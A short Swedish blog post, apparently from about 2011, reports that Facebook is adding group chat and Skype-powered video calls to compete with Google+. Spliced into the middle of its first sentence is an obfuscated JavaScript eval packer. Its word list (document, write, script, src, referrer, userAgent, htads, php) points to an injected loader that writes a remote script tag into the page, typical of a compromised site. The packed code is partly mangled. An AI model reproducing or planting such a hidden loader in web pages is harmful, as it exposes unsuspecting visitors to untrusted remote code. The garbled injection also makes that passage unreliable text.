Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Facebook ska lansera gruppchatt och videosamtal

Facebook ska lansera gruppchatt och videosamtal
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arysb|var|u0026u|referrer|htads||js|php’.split(’|’),0,{}))
ni kanske redan vet om så är Google på väg att släppa sitt nya community Google+. Det gäller att hänga med i svängarna för Facebook och därför lansera lite nya funktioner som användarna vill ha.

Idag höll Facebook ett event där man tidigare hade utlovat att något helt otroligt skulle läggas fram. Gruppchatt och videosamtal var de två tyngsta nyhterna som ska läggas till på Facebook. Efter dem så nämndes det även att en ny design och lite små fix kommer att ordnas till.

Det har varit lite små buggar på chatten och detta ska försöka att ordnas så fort som möjligt. Vanliga fel är att man ibland inte står som inloggad fast man är det. Då försvinner meddelandet som sändaren har skickat.

Videosamtals-tjänsten är framtagen ihop med Skype. Videosamtal kommer vara tillgängligt för alla inom några veckor och vill man testa redan idag så kan göra det här. Till skillnad från Google+ så kommer man inte kunna gruppsamtala via video.

Förutom allt detta så nämnde Mark Zuckerberg också att Facebook nu har 750 miljoner användare!!!
blog.facebook.com